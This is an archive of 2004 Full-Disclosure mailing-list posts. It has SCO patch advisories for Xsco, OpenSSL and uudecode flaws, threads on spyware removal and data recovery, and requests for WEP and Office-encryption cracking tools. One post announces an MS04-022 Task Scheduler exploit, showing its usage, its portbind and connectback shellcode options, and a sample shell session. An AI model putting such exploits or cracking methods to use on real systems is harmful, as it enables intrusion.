[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Simmons, Thomas
Sent: Friday, July 30, 2004 3:53 PM
To: Max Valdez; full-disclosurelists.netsys.com
Subject: [Full-Disclosure] WEP Crack utility for Windows XP

Does anyone know of a good WEP Cracking Utility that will run on Windows
XP.

Thomas Simmons
Network\Server Support
Thomas.SimmonsNCFCorp.Com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] OpenServer 5.0.6 OpenServer 5.0.7 : Xsco contains a buffer overflow that could be exploited to gain root privileges.

please_reply_to_securitysco.com
Date: Fri Jul 30 2004 - 15:27:28 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________

                        SCO Security Advisory

Subject: OpenServer 5.0.6 OpenServer 5.0.7 : Xsco contains a buffer overflow that could be exploited to gain root privileges.
Advisory number: SCOSA-2004.3
Issue date: 2004 July 29
Cross reference: sr889371 fz528866 erg712547 CAN-2004-0083 CAN-2004-0084 CAN-2004-0106
______________________________________________________________________________

1. Problem Description

        A buffer overflow in ReadFontAlias from dirfile.c of Xsco
        may allow local users and remote attackers to execute
        arbitrary code via a font alias file with a long token.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0083 to this issue.

        Buffer overflow in the ReadFontAlias function in Xsco,
        when using the CopyISOLatin1Lowered function, may allow
        local or remote authenticated users to execute arbitrary
        code via a malformed entry in the font alias file.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0084 to this issue.

        Multiple flaws in reading font files.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0106 to these issues.

2. Vulnerable Supported Versions

        System Binaries
        ----------------------------------------------------------------------
        OpenServer 5.0.6 /usr/bin/X11/Xsco
        OpenServer 5.0.7 /usr/bin/X11/Xsco

3. Solution

        The proper solution is to install the latest packages.

4. OpenServer 5.0.6

        4.1 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.3

        4.2 Verification

        MD5 (VOL.000.000) = 7341b2e45bfc55b838009d8a1c49d000

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools

        4.3 Installing Fixed Binaries

        Upgrade the affected binaries with the following sequence:

        1) Download the VOL* files to a directory

        2) Run the custom command, specify an install from media
        images, and specify the directory as the location of
        the images.

5. OpenServer 5.0.7

        5.1 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.3

        The fixes are also available in SCO OpenServer Release 5.0.7
        Maintenance Pack 3 or later. See
        http://www.sco.com/support/update/download/osr507list.html.

        5.2 Verification

        MD5 (VOL.000.000) = 7341b2e45bfc55b838009d8a1c49d000

        MD5 (507mp3_vol.tar) = c927aefdd50b50aca5d29e08c1562aec

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools

        5.3 Installing Fixed Binaries

        Upgrade the affected binaries with the following sequence:

        1) Download the VOL* files to the /tmp directory

        2) Run the custom command, specify an install from media
        images, and specify the /tmp directory as the location of
        the images.

        Or see the Maintenance Pack 3 Release and Installation Notes at

        ftp://ftp.sco.com/pub/openserver5/507/mp/mp3/osr507mp3.txt

6. References

        Specific references for this advisory:
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0083
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0084
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0106

        SCO security resources:
                http://www.sco.com/support/security/index.html

        SCO security advisories via email:
                http://www.sco.com/support/forums/security.html

        This security fix closes SCO incidents sr889371 fz528866
        erg712547.

7. Disclaimer

        SCO is not responsible for the misuse of any of the information
        we provide on this website and/or through our security
        advisories. Our advisories are a service to our customers
        intended to promote secure installation and use of SCO
        products.

8. Acknowledgments

        Greg MacManus (iDEFENSE Labs) is credited with the discovery
        of this vulnerability. Additionally David Dawes discovered
        further flaws in reading font files.

______________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (SCO/UNIX_SVR5)

iD8DBQFBCqG8aqoBO7ipriERAkmYAJ9/6a/7zQke5Eht4cuTuHtpDxr2rwCgqRtR
edH7NQKjSfWXFbk9RJB/Etk=
=8TYG
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] UnixWare 7.1.3 Open UNIX 8.0.0 : Xsco contains a buffer overflow that could be exploited to gain root privileges.

please_reply_to_securitysco.com
Date: Fri Jul 30 2004 - 15:27:24 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________

                        SCO Security Advisory

Subject: UnixWare 7.1.3 Open UNIX 8.0.0 : Xsco contains a buffer overflow that could be exploited to gain root privileges.
Advisory number: SCOSA-2004.2
Issue date: 2004 July 29
Cross reference: sr889370 fz528865 erg712546 CAN-2004-0083 CAN-2004-0084 CAN-2004-0106
______________________________________________________________________________

1. Problem Description

        A buffer overflow in ReadFontAlias from dirfile.c of Xsco
        may allow local users and remote attackers to execute
        arbitrary code via a font alias file with a long token.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0083 to this issue.

        Buffer overflow in the ReadFontAlias function in Xsco,
        when using the CopyISOLatin1Lowered function, may allow
        local or remote authenticated users to execute arbitrary
        code via a malformed entry in the font alias file.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0084 to this issue.

        Multiple flaws in reading font files.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0106 to these issues.
        

2. Vulnerable Supported Versions

        System Binaries
        ----------------------------------------------------------------------
        UnixWare 7.1.3 /usr/X/bin/Xsco
        Open UNIX 8.0.0 /usr/X/bin/Xsco

3. Solution

        The proper solution is to install the latest packages.

4. UnixWare 7.1.3 / Open UNIX 8.0.0

        4.1 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2004.2

        4.2 Verification

        MD5 (erg712546.pkg.Z) = a7ca45fddc3990268e2779a16601b323

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools

        4.3 Installing Fixed Binaries

        Upgrade the affected binaries with the following sequence:

        Download erg712546.pkg.Z to the /var/spool/pkg directory

        # uncompress /var/spool/pkg/erg712546.pkg.Z
        # pkgadd -d /var/spool/pkg/erg712546.pkg

5. References

        Specific references for this advisory:
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0083
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0084
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0106

        SCO security resources:
                http://www.sco.com/support/security/index.html

        SCO security advisories via email:
                http://www.sco.com/support/forums/security.html

        This security fix closes SCO incidents sr889370 fz528865
        erg712546.

6. Disclaimer

        SCO is not responsible for the misuse of any of the information
        we provide on this website and/or through our security
        advisories. Our advisories are a service to our customers
        intended to promote secure installation and use of SCO
        products.

7. Acknowledgments

        Greg MacManus (iDEFENSE Labs) is credited with the discovery
        of this vulnerability. Additionally David Dawes discovered
        further flaws in reading font files.

______________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (SCO/UNIX_SVR5)

iD8DBQFBCqGxaqoBO7ipriERAkoyAJ91gL8wb8JakO+PD8UAu5ud2P/zbACgllGF
CROJ3rJtJ5iFKT7lahBbwcQ=
=OdyX
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Security Web Site Hosting

From: Simon Richter (geierhogyros.de)
Date: Fri Jul 30 2004 - 16:23:08 CDT

Hi,

> Any recommendations on site hosting services / Portal framewroks / site
> builders...

I've heard PHPNuke is pretty solid.

   Simon

--
GPG Fingerprint: 040E B5F7 84F1 4FBC CEAD ADC6 18A0 CC8D 5706 A4B4

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Stateful Packet Inspection

From: Aaron Gray (angraybeeb.net)
Date: Fri Jul 30 2004 - 15:34:40 CDT

> Look into the iptables/netfilter docs, located here:
> http://www.netfilter.org/documentation/index.html
>
> Connection tracking is explained here
> http://www.sns.ias.edu/~jns/security/iptables/iptables_conntrack.html

Thanks I looked at netfilter a somewhile ago but found nothing on SPI.

Cheers,

Aaron

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: Raj Varada (miscrajesh.biz)
Date: Fri Jul 30 2004 - 16:35:46 CDT

Gregh wrote:

>Absolute and utter rot! I understand YOU may not be able to do it but it CAN
>be done. It is simple logic if you want to look at it another way - whatever
>can be DONE can be UNdone.
>

Did you really mean "whatever can be done can be UNdone"?
How about a format C:? (I haven't seen "unformat" in a very long time.)

R

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] OpenServer 5.0.6 OpenServer 5.0.7 : OpenSSL Multiple Vulnerabilities

please_reply_to_securitysco.com
Date: Fri Jul 30 2004 - 15:27:33 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________

                        SCO Security Advisory

Subject: OpenServer 5.0.6 OpenServer 5.0.7 : OpenSSL Multiple Vulnerabilities
Advisory number: SCOSA-2004.10
Issue date: 2004 July 29
Cross reference: sr890284 fz529412 erg712603 TA04-078A VU#288574 VU#465542 CAN-2004-0079 CAN-2004-0081 CAN-2004-0112
______________________________________________________________________________

1. Problem Description

        OpenSSL implements the Secure Sockets Layer (SSL) and
        Transport Layer Security (TLS) protocols and includes a
        general purpose cryptographic library. SSL and TLS are
        commonly used to provide authentication, encryption,
        integrity, and non-repudiation services to network
        applications including HTTP, IMAP, POP3, SMTP, and LDAP.

        The U.K. National Infrastructure Security Co-ordination
        Centre (NISCC) and the OpenSSL Project have reported several
        vulnerabilities in the OpenSSL SSL/TLS library (libssl).
        Any application or system that uses this library may be
        affected.

        CERT Vulnerability Note VU#288574
        OpenSSL contains null-pointer assignment in do_change_cipher_spec()
        function

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0079 to this issue.

        CERT Vulnerability Note VU#465542
        OpenSSL does not properly handle unknown message types

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0081 to this issue.

        CERT Vulnerability Note VU#484726
        OpenSSL does not adequately validate length of Kerberos ticket
        during SSL/TLS handshake.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0112 to this issue.

2. Vulnerable Supported Versions

        System Binaries
        ----------------------------------------------------------------------
        OpenServer 5.0.6 OpenSSL distribution
        OpenServer 5.0.7 OpenSSL distribution

3. Solution

        The proper solution is to install the latest packages.

        SCOSA-2004.10 is an update of gwxlibs to version 1.3.3Db.

        A full list of changes to gwxlibs is at

        ftp://ftp.sco.com/pub/openserver5/507/mp/mp3/osr507mp3.html#rn507mp_gwxlibs
        

4. OpenServer 5.0.6

        4.1 First install oss646c or later

        4.2 Location of oss646c

        ftp://ftp.sco.com/pub/openserver5/oss646c/

        4.3 Verification of oss646c

        MD5 (VOL.000.000) = f19b6c6949f615316bfb075d249989e8
        MD5 (VOL.000.001) = 341ff8553aecd2c7b0c2beaf83030d0f
        MD5 (VOL.000.002) = 6e46708ad8029e12280d4f9ac60ab814
        MD5 (VOL.000.003) = 2868b64a6a6db742adb3b485be645d7e
        MD5 (VOL.000.004) = 1696fe1db9bb063827ee5e76e58dff84
        MD5 (VOL.000.005) = f39da342f8af72fcaccdf478dca04109
        MD5 (VOL.000.006) = 2b31611c8af7d2e7910d6e8e3cf701a6
        MD5 (VOL.000.007) = d0175c0f4e3ed29435b1eab95609f8f4
        MD5 (VOL.000.008) = aa9e8a525c341fed077f981b1dacb486
        MD5 (VOL.000.009) = 8e023af67b57507824406bdda322079a
        MD5 (VOL.000.010) = 2b46e8adba8ae0b64109f2069da978a2

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools

        4.4 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.10

        4.5 Verification

        MD5 (VOL.000.000) = a85cf35c417903522392064aaa98f0a4
        MD5 (VOL.000.001) = d4383d6bc74bb6e873e7a4c8dfdc4e6b
        MD5 (VOL.000.002) = c5657b1358ef96177ae15fdcfec7132f
        MD5 (VOL.000.003) = 4c88ceb3502330b4c4d5e07ca7fc5214

        4.6 Installing Fixed Binaries

        Upgrade the affected binaries with the following sequence:

        1) Download the VOL* files to a directory

        2) Run the custom command, specify an install from media
        images, and specify the directory as the location of
        the images.

5. OpenServer 5.0.7

        5.1 Location of Fixed Binaries

        The fixes are only available in SCO OpenServer Release 5.0.7
        Maintenance Pack 3 or later. See
        http://www.sco.com/support/update/download/osr507list.html.

        5.2 Verification

        MD5 (507mp3_vol.tar) = c927aefdd50b50aca5d29e08c1562aec

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools

        5.3 Installing Fixed Binaries

        See the Maintenance Pack 3 Release and Installation Notes at

        ftp://ftp.sco.com/pub/openserver5/507/mp/mp3/osr507mp3.txt

6. References

        Specific references for this advisory:
                http://www.us-cert.gov/cas/techalerts/TA04-078A.html
                http://www.kb.cert.org/vuls/id/288574
                http://www.kb.cert.org/vuls/id/484726
                http://www.kb.cert.org/vuls/id/465542
                http://www.openssl.org/news/secadv_20040317.txt
                http://www.uniras.gov.uk/vuls/2004/224012/index.htm
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0079
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0112
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0081

        SCO security resources:
                http://www.sco.com/support/security/index.html

        SCO security advisories via email
                http://www.sco.com/support/forums/security.html

        This security fix closes SCO incidents sr890284 fz529412
        erg712603.

7. Disclaimer

        SCO is not responsible for the misuse of any of the information
        we provide on this website and/or through our security
        advisories. Our advisories are a service to our customers
        intended to promote secure installation and use of SCO
        products.

8. Acknowledgments

        SCO would like to thank The U.K. National Infrastructure
        Security Co-ordination Centre (NISCC) and the OpenSSL team.

______________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (SCO/UNIX_SVR5)

iD8DBQFBCq1saqoBO7ipriERAqUzAJ9J5ZMCGg6g5h95XMWzGfHwWQjeOQCghZ8R
wQZt88hV6ULbpA6SODPlYNM=
=0l/V
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] OpenServer 5.0.6 OpenServer 5.0.7 : uudecode does not check for symlink or pipe

please_reply_to_securitysco.com
Date: Fri Jul 30 2004 - 15:27:38 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________

                        SCO Security Advisory

Subject: OpenServer 5.0.6 OpenServer 5.0.7 : uudecode does not check for symlink or pipe
Advisory number: SCOSA-2004.12
Issue date: 2004 July 29
Cross reference: sr864864 fz527541 erg712054 CAN-2002-0178
______________________________________________________________________________

1. Problem Description

        The uudecode utility would create an output file without
        checking to see if it was about to write to a symlink or a
        pipe. If a user uses uudecode to extract data into open
        shared directories, such as /tmp, this vulnerability could
        be used by a local attacker to overwrite files or lead to
        privilege escalation.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2002-0178 to this issue.

2. Vulnerable Supported Versions

        System Binaries
        ----------------------------------------------------------------------
        OpenServer 5.0.6 /usr/bin/uudecode
        OpenServer 5.0.7 /usr/bin/uudecode

3. Solution

        The proper solution is to install the latest packages.

4. OpenServer 5.0.6

        4.1 First install oss646b or later

        4.2 Location of oss646c

        ftp://ftp.sco.com/pub/openserver5/oss646c/

        4.3 Verification of oss646c

        MD5 (VOL.000.000) = f19b6c6949f615316bfb075d249989e8
        MD5 (VOL.000.001) = 341ff8553aecd2c7b0c2beaf83030d0f
        MD5 (VOL.000.002) = 6e46708ad8029e12280d4f9ac60ab814
        MD5 (VOL.000.003) = 2868b64a6a6db742adb3b485be645d7e
        MD5 (VOL.000.004) = 1696fe1db9bb063827ee5e76e58dff84
        MD5 (VOL.000.005) = f39da342f8af72fcaccdf478dca04109
        MD5 (VOL.000.006) = 2b31611c8af7d2e7910d6e8e3cf701a6
        MD5 (VOL.000.007) = d0175c0f4e3ed29435b1eab95609f8f4
        MD5 (VOL.000.008) = aa9e8a525c341fed077f981b1dacb486
        MD5 (VOL.000.009) = 8e023af67b57507824406bdda322079a
        MD5 (VOL.000.010) = 2b46e8adba8ae0b64109f2069da978a2

        4.4 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.12

        4.5 Verification

        MD5 (VOL.000.000) = 53e8739812e5bfd7f3504d467e979019

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools

        4.6 Installing Fixed Binaries

        Upgrade the affected binaries with the following sequence:

        1) Download the VOL* files to the /tmp directory

        2) Run the custom command, specify an install from media
        images, and specify the /tmp directory as the location of
        the images.

5. OpenServer 5.0.7

        5.1 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.12

        The fixes are also available in SCO OpenServer Release 5.0.7
        Maintenance Pack 3 or later. See
        http://www.sco.com/support/update/download/osr507list.html.

        5.2 Verification

        MD5 (VOL.000.000) = 53e8739812e5bfd7f3504d467e979019

        MD5 (507mp3_vol.tar) = c927aefdd50b50aca5d29e08c1562aec

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools

        5.3 Installing Fixed Binaries

        Upgrade the affected binaries with the following sequence:

        1) Download the VOL* files to the /tmp directory

        2) Run the custom command, specify an install from media
        images, and specify the /tmp directory as the location of
        the images.

        Or see the Maintenance Pack 3 Release and Installation Notes at

        ftp://ftp.sco.com/pub/openserver5/507/mp/mp3/osr507mp3.txt

6. References

        Specific references for this advisory:
                http://www.aerasec.de/security/index.html?id=ae-200204-033&lang=en
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0178

        SCO security resources:
                http://www.sco.com/support/security/index.html
        SCO security advisories via email
                http://www.sco.com/support/forums/security.html

        This security fix closes SCO incidents sr864864 fz527541
        erg712054.

7. Disclaimer

        SCO is not responsible for the misuse of any of the information
        we provide on this website and/or through our security
        advisories. Our advisories are a service to our customers
        intended to promote secure installation and use of SCO
        products.

______________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (SCO/UNIX_SVR5)

iD8DBQFBCqGmaqoBO7ipriERAiTGAJsFXtXRf+Gp7oo6F8W6Un5uLm01CQCbBPPk
YHPyFvekzIswp7A8jQAuw34=
=9v1h
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: John Kinsella (jlkthrashyour.com)
Date: Fri Jul 30 2004 - 20:01:41 CDT

On Fri, Jul 30, 2004 at 05:35:46PM -0400, Raj Varada wrote:
> Did you really mean "whatever can be done can be UNdone"?
> How about a format C:? (I haven't seen "unformat" in a very long time.)

Data can be read off a hard drive until it's been written over like
what...8 times IIRC? So, in theory, one "format C:" can be undone. ;)

John

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Cool Web Search

From: Steven Yu (sjyuucsd.edu)
Date: Fri Jul 30 2004 - 20:39:16 CDT

No unformat? Pfft... you obviously haven't read this article

http://www.computer.org/security/garfinkel.pdf

Steve

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Raj Varada
Sent: Friday, July 30, 2004 2:36 PM
To: Gregh
Cc: Disclosure Full
Subject: Re: [Full-Disclosure] Cool Web Search

Gregh wrote:

>Absolute and utter rot! I understand YOU may not be able to do it but it
CAN
>be done. It is simple logic if you want to look at it another way -
whatever
>can be DONE can be UNdone.
>

Did you really mean "whatever can be done can be UNdone"?
How about a format C:? (I haven't seen "unformat" in a very long time.)

R

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Cool Web Search

From: Dean Porter (deancenterpartners.com)
Date: Fri Jul 30 2004 - 21:07:06 CDT

Has any one dealt with a similar thing called "searchweb2.com"?

This installed itself into two folders: "C:\Program Files\htm acid soap",
and "C:\Documents and Settings\All Users\Application Data\spam wipe that
audio" and then integrated itself into Internet Explorer as a "Search Bar",
that you can't turn off or on via the Right-Click (over the toolbars)
toolbars menu. It also sets the home page to point to
"http://searchweb2.com" and then sets the "page can't be found" to a page
with directory it - which reloads it self.

Neither Adware nor Spybot did anything about this. BHODemon doesn't see it
either (though I loaded BHODemon after I was hit by this).

It seems to have a "hidden" process that runs an executable from one of
these folders ("2 LOAD SETUP.exe" or "Once Grid.exe") which loads up two
hidden copies IExplore, if you kill the IExplore processes, they relaunch.

I cleaned it off my system by booting in safe mode, removing the links from
HLM\Software\Microsoft\Windows\CurrentVersion\Run, cleaning with HiJackThis,
and then deleting the files in these folders.

Anyway, I was wondering if anyone else has dealt with this, what it actually
does (besides create a search bar and pop ads), and if I got it all.

Dean

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: [OT] Hard drive recovery (WAS CoolWebSearch)

From: Andrew Farmer (andfarmteknovis.com)
Date: Fri Jul 30 2004 - 20:42:04 CDT

On 30 Jul 2004, at 18:01, John Kinsella wrote:
> On Fri, Jul 30, 2004 at 05:35:46PM -0400, Raj Varada wrote:
>> Did you really mean "whatever can be done can be UNdone"?
>> How about a format C:? (I haven't seen "unformat" in a very long
>> time.)
>
> Data can be read off a hard drive until it's been written over like
> what...8 times IIRC? So, in theory, one "format C:" can be undone. ;)

Well, DOS format doesn't overwrite anything but the metadata by
default. So
that's pretty easy to undo as long as you have some idea of how data
was laid
out.

If you're talking about overwritten data, though, you can't recover
wiped
data without a cleanroom, specialized equipment, and a LOT of time -
especially with newer hard drives, as bit sizes shrink and on-drive
error
correction and compression get more complex.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iD8DBQFBCvjsPa6RRaKl0ScRAsusAKCN9jVieLthcLRMLG+5rd2PvysK2gCdHnrL
Y0yPTm4xfowYoL8Grak1O48=
=BlCV
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Why should one buy (or not) an Appliance-based security gateway?

From: Ron DuFresne (dufresnewinternet.com)
Date: Fri Jul 30 2004 - 21:36:34 CDT

        [SNIP]

>
> An often overlooked issue is that the right choice for a clued and technically
> competent site is quite often a poor choice for a site that's not able to
> get its clue together. And there's a lot more of the latter than the former.
>

Which is also a reason some opt for another alternative and outsource
their security needs. There are some bad as well as some darned good
companies that do security monitor/warning for those orgs that find this
their best/better alternative.

Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Stateful Packet Inspection

From: Ron DuFresne (dufresnewinternet.com)
Date: Fri Jul 30 2004 - 21:42:07 CDT

On Fri, 30 Jul 2004, Aaron Gray wrote:

> > Look into the iptables/netfilter docs, located here:
> > http://www.netfilter.org/documentation/index.html
> >
> > Connection tracking is explained here
> > http://www.sns.ias.edu/~jns/security/iptables/iptables_conntrack.html
>
> Thanks I looked at netfilter a somewhile ago but found nothing on SPI.
>

Google search: IPtables SPI ;;

http://www.google.com/search?q=IPtables+SPI&sourceid=mozilla-search&start=0&start=0

Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Crack Microsoft Office encryption

From: Raj Mathur (rajulinux-delhi.org)
Date: Fri Jul 30 2004 - 22:25:08 CDT

Anyone have pointers to a free (open source) tool or methodology to
crack MS Office encrypted files? Both brute-force and smarter methods
are fine, smarter preferred, of course :)

I believe that Office encrypts files using RC4, is that correct?

Thanks,

-- Raju
--
Raj Mathur rajukandalaya.org http://kandalaya.org/
       GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F
                      It is the mind that moves

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit

From: pigrelax (pigrelaxyandex.ru)
Date: Sat Jul 31 2004 - 01:34:20 CDT

Hi all!

Microsoft Windows XP Task Scheduler (.job) Universal Exploit

* Tested on:
 * - Internet Explorer 6.0 (SP1) (iexplore.exe)
 * - Explorer (explorer.exe)
 * - Windows XP SP0, SP1
 *
 * -------------------------------------------------------------------
 * Compile:
 * Win32/VC++ : cl HOD-ms04022-task-expl.c
 * Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib
 * Linux : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c
 *
 * -------------------------------------------------------------------
 * Command Line Parameters/Arguments:
 *
 * HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
 *
 * Shellcode:
 * 1 - Portbind shellcode
 * 2 - Connectback shellcode
 *
 * -------------------------------------------------------------------
 * Example:
 *
 * C:\>HOD-ms04022-task-expl.exe expl.job 1 7777
 *
 * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
 *
 * --- Coded by .::[ houseofdabus ]::. ---
 *
 * [*] Shellcode: Portbind, port = 7777
 * [*] Generate file: expl.job
 *
 * C:\>
 *
 * start IE -> C:\
 *
 * C:\>telnet localhost 7777
 * Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
 * (‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.
 *
 * C:\Documents and Settings\v.X\ ¡®ç¨© á⮫>
 *

http://www.securitylab.ru/46820.html

……………………………
MaxPatrol is a professional network security scanner distinguished by its
uncompromisingly high quality of scanning, optimized for effective use by
companies of any size (serving from a few to tens of thousands of nodes).
http://www.Maxpatrol.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Crack Microsoft Office encryption

From: Laurent LEVIER (llevierargosnet.com)
Date: Sat Jul 31 2004 - 02:16:35 CDT

Hi,

At 05:25 31/07/2004, Raj Mathur wrote:
>Anyone have pointers to a free (open source) tool or methodology to
>crack MS Office encrypted files? Both brute-force and smarter methods
>are fine, smarter preferred, of course :)
I know no one FREE, but the serie from Elcomsoft
(http://www.elcomsoft.com) works pretty well.

Hope this helps

Brgrds

Laurent LEVIER
Systems & Networks Security Expert, CISSP CISM

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: Denis McMahon (denis.mcmahonntlworld.com)
Date: Sat Jul 31 2004 - 02:29:25 CDT

Dean Porter wrote:

> Has any one dealt with a similar thing called "searchweb2.com"?

Nope, but as a general fallback on windows systems that have and ebd
that gives a dos console:

1) identify the elements you need to remove on the live system.

2) boot the ebd and use the ebd tools to remove the unwanted items.

3) reboot without the ebd and check all the stuff you wanted to remove
has gone.

Denis

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [Paper] Designing secure desktop operating system

From: Timo Sirainen (tssiki.fi)
Date: Sat Jul 31 2004 - 04:15:39 CDT

[possibly somewhat off-topic here, secureosprocontrol.fi can be used
for discussion about it]

I've written down some ideas how I think it would be possible to
implement easy to use and quite secure graphical user interface and
operating system around it to make it possible. It's available at
http://iki.fi/tss/security/os.html

Currently I'd be very interested about hearing comments why my ideas
simply wouldn't work with certain kind of software or would be just too
much pain. Or some other fundemental technical problem why this could
never work. Or more positively, people who would be willing to
participate in more complete design or implementation.

To avoid too many replies for issues that are either addressed there or
aren't exactly relevant, please don't reply if you're only going to:

 - suggest using SELinux, Java sandboxes or similar (yes, maybe based on
them, that's not the point)
 - say how sandboxing limits usability and it would never be user-
friendly (it could)
 - say how user-friendliness and security are always mutually exclusive
(they're not)
 - say how it's going to be too difficult to users to keep updating
access control lists to run software they want (it's not needed)
 - confuse operating system with kernel (OS is more than just kernel)
 - say how no matter how "secure" you're trying to be, some people will
always bypass it and hurt themselves/others (yes, it's true for home
users)

I've heard all of those too many times already and I think they're all
answered well enough in the paper.
